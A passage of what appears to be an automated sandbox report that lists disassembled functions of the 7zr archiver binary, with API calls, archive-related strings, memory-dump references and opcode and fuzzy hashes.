                            • Opcode Fuzzy Hash: 6351bc0989cd4a1fe2509f4c9f6df3cfd6520179e67bb7f39631541a6e56b783
                            • Instruction Fuzzy Hash: 58D01231508662469A641E3C78459C633D95B16374371079AF0B4C33E1F360CCC34694
                            Function 00756B23 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000), ref: 00756B31
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 350f0c9ca84e6d77d65709461987d75595753e6cf9f7d0ede4b626c353bee121
                            • Instruction ID: 2fa474bab8eefe27638bb3be1a60f13062ac1bb15b6c704dee308e0cfd281e76
                            • Opcode Fuzzy Hash: 350f0c9ca84e6d77d65709461987d75595753e6cf9f7d0ede4b626c353bee121
                            • Instruction Fuzzy Hash: DAC08CE1A4D280DFDF0213109C40B603B208B87300F0A00C5E5085B092C2081808C762
                            Function 007569D0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                            • Instruction ID: d8bbdbddd279d83e6fc697c0eed8fa677709b8be6dbcab2cb29292c4b8080781
                            • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                            • Instruction Fuzzy Hash: D3A012C961204001DE5C11303819457100012502077C414BCBD02C1105F71DE1081045
                            Function 00756AF0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                            • Instruction ID: 16d16cb56bd693a296d3810f64963c7d015718f685632363d55c7e6275dc67dd
                            • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                            • Instruction Fuzzy Hash: 1FA012CCF01000019E0510343815453201222E06067D8C474AC0141109FB5CD0082002
                            Function 00756BA3 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            APIs
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00756BAC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 68dcadf0f2d5bdb0acb1a39086e22bc06b6426284160dc45a3f1ee5441be171e
                            • Instruction ID: ed4542046a9417b439573f322b18cb31060a8ddbd5496351bd0107140d6a10e2
                            • Opcode Fuzzy Hash: 68dcadf0f2d5bdb0acb1a39086e22bc06b6426284160dc45a3f1ee5441be171e
                            • Instruction Fuzzy Hash: 92A00278780700B7ED6167307D4FF5937247784F45F30C5487345690D06AE87084DA9C
                            Function 007569F0 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                            • Instruction ID: cdfcf48611c8f55222de31428320655435190ecbac1e8e036c6a1139737afd81
                            • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                            • Instruction Fuzzy Hash:
                            Function 00756B10 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                            • Instruction ID: 2499f238b076b68bcefbd1f1cc78978792454891ee544a834b2b61ca994af457
                            • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                            • Instruction Fuzzy Hash:
                            Function 006D1E40 Relevance: 1.3, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 41781109e2e43ce1202a3d4c5f39ea06656657e3f3a59fabc9cd3236bd26250f
                            • Instruction ID: b9ce8a67dd30aeebed0283b65dd125eb32626c287492e507b4e4fc50b633b36b
                            • Opcode Fuzzy Hash: 41781109e2e43ce1202a3d4c5f39ea06656657e3f3a59fabc9cd3236bd26250f
                            • Instruction Fuzzy Hash: E7A002B1406105DBDA061B10ED094897B65EB89667B61846DF15B608718B3548A0BB05

                            Non-executed Functions

                            Function 00770090 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: Version
                            • String ID:
                            • API String ID: 1889659487-0
                            • Opcode ID: 2a928df7e633a69c682b0d111d5ad49c616fddef8450d04414c1c53123f368a6
                            • Instruction ID: d50b45457032dc8400273ee9ef8f133ca93d11dfb11d8d2fe806165edd999769
                            • Opcode Fuzzy Hash: 2a928df7e633a69c682b0d111d5ad49c616fddef8450d04414c1c53123f368a6
                            • Instruction Fuzzy Hash: 8DD05B72911505C7DF00772CCC0A39A7761F761380FC88958D86DC5153F97DC695C2D2
                            Function 006DC085 Relevance: 21.5, APIs: 17, Instructions: 290COMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,007848A0,00000010), ref: 006DC09E
                            • memcmp.MSVCRT(?,00780258,00000010), ref: 006DC0BB
                            • memcmp.MSVCRT(?,00780348,00000010), ref: 006DC0CE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: a777e3ce12e6e958f98f9c0b11def254bfca6ca712027d885b263c3b967e142e
                            • Instruction ID: 08384bac0d59ed845e4c72ad0f5b3fd81724f16dbfe582c9dc5d77d83f57b29e
                            • Opcode Fuzzy Hash: a777e3ce12e6e958f98f9c0b11def254bfca6ca712027d885b263c3b967e142e
                            • Instruction Fuzzy Hash: 10916471A40719EBD7609B21DC45FAB73A9AF65760F00802AFD4AD7341FB24EE05C7A0
                            Function 0073447A Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 291COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                            • API String ID: 3519838083-1909666238
                            • Opcode ID: abce41c2c65a7cc35955e04e51fe2609c120cda2458951097ef5d6b52dfc2521
                            • Instruction ID: 02132dcf05dc062ab77fe0ea1f2150f2d296a7e4acaf794628641318bbf9edd0
                            • Opcode Fuzzy Hash: abce41c2c65a7cc35955e04e51fe2609c120cda2458951097ef5d6b52dfc2521
                            • Instruction Fuzzy Hash: BEC1AF71D0428AEFEB1DDF64C855AFD7BB1AB11300F1980A9E0496B263D739BE45DB40
                            Function 006D64F3 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116threadCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D64F8
                            • GetCurrentThreadId.KERNEL32 ref: 006D6508
                            • GetTickCount.KERNEL32 ref: 006D6513
                            • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 006D651E
                            • GetTickCount.KERNEL32 ref: 006D6578
                            • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 006D65C5
                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 006D65EC
                              • Part of subcall function 006D5D7A: __EH_prolog.LIBCMT ref: 006D5D7F
                              • Part of subcall function 006D5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 006D5DA1
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                            • String ID: .tmp$d
                            • API String ID: 1989517917-2797371523
                            • Opcode ID: c4d1ba0013507d75e3ff298a4be9d0d184a4a2934ed2a1746747c8f49d32b71f
                            • Instruction ID: a60051503b7fdb916b1706d88d2f0dd1baf261aab620832d46b82fdba147fe53
                            • Opcode Fuzzy Hash: c4d1ba0013507d75e3ff298a4be9d0d184a4a2934ed2a1746747c8f49d32b71f
                            • Instruction Fuzzy Hash: A941FF72D10124DBCF16ABA0E8557EC77B2BF59354F14412FF806AA3A2CB388984CB55
                            Function 00706244 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputs
                            • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                            • API String ID: 1798449854-1259944392
                            • Opcode ID: 7d474e802e58947d97aa4a889707df5034db88a67d7f0a297740ab193697fdff
                            • Instruction ID: b6b16eab03d836d3b9e7d83a051eded126e6b3d7b490094dcea7db61d2a05f38
                            • Opcode Fuzzy Hash: 7d474e802e58947d97aa4a889707df5034db88a67d7f0a297740ab193697fdff
                            • Instruction Fuzzy Hash: 71217171E00505DFCB15EBA4C952AAEB3E5FF58350B00413EE506D7791CB78AD12CB84
                            Function 006DA08C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006DA091
                              • Part of subcall function 006D9BAA: RegCloseKey.ADVAPI32(?,?,006D9BA0), ref: 006D9BB6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseH_prolog
                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                            • API String ID: 1579395594-270022386
                            • Opcode ID: d3aa43de79c71986e12ba25994add8e502ff3105d3c1c98d03228b2749ab1fd0
                            • Instruction ID: 8ab196ad15b41e6ce9d3068d796291a4d094e66c5e78f1cc28921954452e2aa5
                            • Opcode Fuzzy Hash: d3aa43de79c71986e12ba25994add8e502ff3105d3c1c98d03228b2749ab1fd0
                            • Instruction Fuzzy Hash: 38519E71E00205DFCF15EFA8C8929EEB7B6BF59340F00842EE516A7381DB749A05CB91
                            Function 0072C44E Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0072C453
                              • Part of subcall function 0072C1DF: __EH_prolog.LIBCMT ref: 0072C1E4
                              • Part of subcall function 0072C543: __EH_prolog.LIBCMT ref: 0072C548
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID: ((x$<(x$L(x$\(x
                            • API String ID: 3744649731-895272097
                            • Opcode ID: 74b4e88d117cfbafd283cce8aea320d80e9abf1cf5be7bcf38886448e85a738e
                            • Instruction ID: c33b7a406f7f53fb0c1eaff7ce10c12eb956418d48f017c21c67259c1fcf54db
                            • Opcode Fuzzy Hash: 74b4e88d117cfbafd283cce8aea320d80e9abf1cf5be7bcf38886448e85a738e
                            • Instruction Fuzzy Hash: A2218DB0900B44CECB24EF6AD44965BFBF4FF54304F10896ED49A97751DBB8AA08CB54
                            Function 00706025 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070602A
                            • EnterCriticalSection.KERNEL32(00792938), ref: 00706044
                            • LeaveCriticalSection.KERNEL32(00792938), ref: 00706060
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterH_prologLeave
                            • String ID: v$8)y
                            • API String ID: 367238759-625179386
                            • Opcode ID: a59ca210b6934004550b3a599f98dba21b5b360d50832772b2b6337076758f44
                            • Instruction ID: 285de8e40422aa4e25777901d646abe2e6e874b715eb5dbd9fc9c38508c5f6f0
                            • Opcode Fuzzy Hash: a59ca210b6934004550b3a599f98dba21b5b360d50832772b2b6337076758f44
                            • Instruction Fuzzy Hash: 48F03A76900114EFCB05DF98D909EDEBBB8FF493A0F14816AF409A7211C7B99A00CBA4
                            Function 007303D6 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 212COMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 007303F5
                            • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00730490
                            • memset.MSVCRT ref: 00730618
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memset$memcpy
                            • String ID: $@
                            • API String ID: 368790112-1077428164
                            • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                            • Instruction ID: 1b242f30b191c65369fa789d7fe226683e87fbaa22320884351225575c2863c8
                            • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                            • Instruction Fuzzy Hash: 4A91BD31900709EFEF20DF24C866BDAB7B1AF50304F048469E59A56593D778BAA9CFD0
                            Function 006D613C Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D6141
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                            • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 006D6197
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 006D626E
                            • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 006D62A9
                              • Part of subcall function 006D6096: __EH_prolog.LIBCMT ref: 006D609B
                              • Part of subcall function 006D6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 006D60DF
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 006D6285
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$H_prolog$DeleteFile
                            • String ID:
                            • API String ID: 3586524497-0
                            • Opcode ID: 2399f3d6fe2270094cf88cee1607f3ca28be5bd77aa1f78276f6996df4357fb4
                            • Instruction ID: 378641ceb2d14b2bfa91898caa85ac08cd34abcb2d17c690bfa1ce19d5a298e3
                            • Opcode Fuzzy Hash: 2399f3d6fe2270094cf88cee1607f3ca28be5bd77aa1f78276f6996df4357fb4
                            • Instruction Fuzzy Hash: FF51A931C04218AADF15EBE8D852BEDBB76AF15350F10416FF84277392CB746A0ACB55
                            Function 006E44C2 Relevance: 7.6, APIs: 6, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,007848A0,00000010), ref: 006E44DB
                            • memcmp.MSVCRT(?,00780128,00000010), ref: 006E44EE
                            • memcmp.MSVCRT(?,00780228,00000010), ref: 006E450B
                            • memcmp.MSVCRT(?,00780248,00000010), ref: 006E4528
                            • memcmp.MSVCRT(?,007801C8,00000010), ref: 006E4545
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: b14299aee2bb96d7aba0b7012b3978c514c85335522ff62939e71d53d6f6a7ef
                            • Instruction ID: 101da6691b00b20927905c73842e21230b58ef9f19a9aa9a2e9425fd543f5ec0
                            • Opcode Fuzzy Hash: b14299aee2bb96d7aba0b7012b3978c514c85335522ff62939e71d53d6f6a7ef
                            • Instruction Fuzzy Hash: C82195B2B41308ABE7049E31DC85FBE33ADAB947A4F048135FD069B245FA68DD0587A0
                            Function 0071C414 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: !$LZMA2:$LZMA:
                            • API String ID: 3519838083-3332058968
                            • Opcode ID: 4e167cb021de91875a799070a4e70a729b584d83ab6563f0b4cef2dad549f494
                            • Instruction ID: 009cd57c630340e3dd7859c9e1d2f42a8f23b2fa34f921c69e1eb7203579e541
                            • Opcode Fuzzy Hash: 4e167cb021de91875a799070a4e70a729b584d83ab6563f0b4cef2dad549f494
                            • Instruction Fuzzy Hash: B061C17098414ADEDB16CBACC55AFFD7BB2AF15344F2440A9E406671E2D778AEC0C750
                            Function 006DA384 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
